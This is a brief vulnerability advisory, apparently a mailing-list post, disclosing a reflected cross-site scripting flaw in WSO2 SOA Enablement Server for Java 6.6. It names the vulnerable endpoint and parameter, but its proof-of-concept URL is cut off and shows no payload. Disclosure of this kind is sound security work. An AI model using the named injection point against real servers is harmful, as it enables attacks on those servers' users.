Posted by Paweł Gocyla on Jul 12

Title: WSO2 SOA Enablement Server – Reflected Cross Site Scripting
Authors: Pawel Gocyla
Date: 08. June 2016

Affected Software:
==================
WSO2 SOA Enablement Server for Java/6.6 build SSJ-6.6-20090827-1616
Probably other versions are also vulnerable.

Vulnerability:
**************

Reflected Cross Site Scripting:
==============================

Proof of Concept:
https://WSO2SOA_IP:6443/invocationConsole?p.wsdlUrl=…